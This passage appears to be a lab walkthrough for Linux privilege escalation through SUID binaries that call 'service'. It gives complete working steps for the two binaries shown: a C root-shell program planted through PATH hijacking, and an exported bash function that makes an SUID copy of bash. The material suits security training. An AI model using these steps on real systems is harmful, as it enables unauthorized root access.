
If you type in `env` you will get a list out of a good number of items.

`find / -type f -perm -04000 -ls 2> /dev/null`  - This is getting repetitive.  ;)

On this machine in the search, for this vuln, we're looking for these two paths

`/usr/local/bin/suid-env` and `/usr/local/bin/suid-env2`

Try to run those two and it looks like they start apache web server.

You can use `strings` to try and pull some info from these.

`strings /usr/local/bin/suid-env` or `strings /usr/local/bin/suid-env2`

If you print that out, you'll see that the last line, on this example, is `service apache2 start`. It's calling `service` in order to start that command.  But without the full path (`/usr/bin/service`) how does it know where to run `service` from?

Environmental Variables.  And we can (sometimes) take advantage of this.  We can add an environmental path and make a malicious `service` command that gives us a root shell.

Make our malicious `service`

`int main() { setgid(0); setuid(0); system("/bin/bash"); return 0;}`

You can use `echo` to echo that into a file, i.e. `/tmp/service.c`

Then compile it

`gcc /tmp/service.c -o /tmp/service`

Here's where we change the $PATH

`export PATH=/tmp:$PATH`

Once all that is done, rerun the suid-env and that should give you root.


Now for suid-env2.  If we run strings on that we get the call to the full path name, so our earlier trick won't work.  But we can still get around it.

We make a function.

`function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }`
`export -f /usr/sbin/service`

Then if we run the suid-env2, it will give us a root shell.
